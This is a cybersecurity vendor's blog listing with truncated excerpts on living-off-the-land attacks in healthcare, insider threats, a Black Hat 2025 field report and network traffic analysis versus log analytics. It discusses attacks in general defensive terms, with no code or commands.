Personam.AI | Our Blog
Living Off the Land: The “Ghost” Cyber Attack Healthcare Security Teams Are Struggling to See
March 23, 2026
Chuck Faughnan, III Personam.ai
Many cyberattacks announce themselves loudly: A ransomware screen appears. A malware alert fires. A security dashboard lights up with warnings.
But some of the most dangerous attacks happening today don’t look like attacks at all.
There is no obvious malware. No suspicious executable. No clearly malicious program running in memory. Instead, the attacker quietly uses tools that already exist inside the environment.
Security professionals call this “Living Off the Land (LOTL)”.
For healthcare organizations, where networks are complex and uptime is critical, these “ghost attacks” are becoming one of the hardest threats to detect.
What “Living Off the Land” Actually Means
A Living Off the Land attack happens when threat actors exploit legitimate tools and administrative utilities already present inside the environment or a system.
Rather than deploying obvious malware, attackers use trusted components of the operating system or the network environment itself. That might include tools like PowerShell, Windows Management Instrumentation (WMI), Remote Desktop Protocol (RDP), or common system utilities used by administrators every day.
Because these tools exist for legitimate reasons, traditional security solutions often treat their activity as normal. The attacker is effectively hiding in plain sight.
The concept is simple: if the activity looks like something an IT administrator might do, traditional detection tools may not flag it.
That ability to blend into routine operations is what makes LOTL techniques so powerful.
Why Healthcare Environments Are Especially Vulnerable
Healthcare networks are uniquely difficult to monitor. Hospitals, research institutions, and healthcare systems operate thousands of devices across multiple environments, many of which cannot […]
The Hidden Cost of “Low and Slow” Insider Threats
Joseph Somori, Threat Analyst
Personam.AI
October 20, 2025
In cybersecurity, the loud threats always steal the spotlight. Ransomware, phishing, malware outbreaks — they all grab attention because they are noisy and fast. But the most dangerous attacks are often the quiet ones. They move slowly, patiently, and deliberately. They hide inside what looks like normal behavior.
I work as a threat analyst with Personam, a company focused on detecting insider threats through behavior-based analytics. My job has taught me how deceptive “normal” can be. Every day, I watch patterns of user behavior that seem ordinary on the surface; logins, downloads, file transfers, but within those patterns, I’ve seen the beginnings of insider attacks. In this role, I have learned how even the most routine actions can hide serious risks. These are what professionals call “low and slow” insider threats. I think about them often, because they remind me that trust is both powerful and fragile. You can have the best firewall, the strongest passwords, and the most advanced monitoring, but if someone already inside decides to act with bad intent, technology alone is not enough.
When “normal” turns into risk
Most security tools are built to react to obvious problems. They raise alerts when someone transfers too much data or tries to access something off-limits. They rely on rules, thresholds, and patterns we already understand. But what happens when an insider takes just enough to stay unnoticed?
That is when “normal” becomes dangerous. A few extra downloads here. A late-night login that looks like dedication. […]
Black Hat USA 2025: Field Report
August 26, 2025
This year’s Black Hat made one thing crystal clear: cybersecurity vendors are no longer just talking about AI, they’re wiring it straight into enterprise data pipelines. Across the expo floor, whether it was the big names like Microsoft, Cisco, and Palo Alto, or NDR specialists like Darktrace, Vectra AI, and ExtraHop, every conversation centered around AI that doesn’t just analyze alerts in isolation but sits natively on network flows, endpoints, and cloud workloads.
The messaging convergensce was striking. Competitors all pitched unsupervised machine learning that learns from raw organizational data, whether packets, telemetry, or identity graphs, and then turns that into “autonomous” detection. The ambition is the same: eliminate signatures, baseline normal activity, and catch anomalies in real time. The problem? Real-world performance still lags. Despite bold claims of “zero false positives,” users report persistent noise, with Vectra AI and Darktrace often called out for flagging up to 50% benign behaviors in hybrid and cloud environments.
Still, the direction of travel is unmistakable: AI is being hardwired into enterprise nervous systems. Instead of siloed threat feeds or rule-based detectors, companies are chasing systems that continuously learn from the customer’s own environment (endpoints, networks, IoT, and cloud) and self-adapt without retraining. This is less about AI as a bolt-on tool and more about AI as the operating principle of the data layer itself.
Beyond the Logs: Why Network Traffic Analysis is the Future of Security
Chuck Faughnan
CEO, Strategic Advisor, & Investor @ Personam.ai | Cybersecurity
November 8, 2024
The pendulum has swung — again. Way back in the ‘90s, the promise of threat detection was in network traffic analysis. The modern computing method of the time was anomaly detection, and it purported to catch all breaches. And… it kind of did that!
The problem, however, is that, by the strictest of definitions, everything is an anomaly. Did you check www.askjeeves.com every day at 12:05pm? Well, that one day you checked it at 12:10pm is an anomaly! That one day you opted for altavista.com? Anomaly! Analysts got bogged down with intense alerting volumes. So, yes, while evidence of an attacker’s tracks were likely caught, you’re still looking for a needle in a haystack.
Enter: log file analytics. This approach became the industry standard. They worked well when networks were simpler and attacks were less sophisticated. Looking at logs provided a relatively effective way to detect and respond to security incidents. However, as networks have grown more complex and cyber threats have evolved, the limitations of log-based security are increasingly apparent. Legacy log-based systems often struggle with scalability, cost, and the ability to detect advanced threats.
It’s time to embrace a more powerful, efficient, cost-effective approach: network traffic analysis!
Limitations of Log-Based Security
Log-based solutions, such as Splunk or QRadar, often have high licensing costs that are variable, and pegged to data storage. As logging utilization increases, so does cost. So there’s that consideration. But what do you do if […]
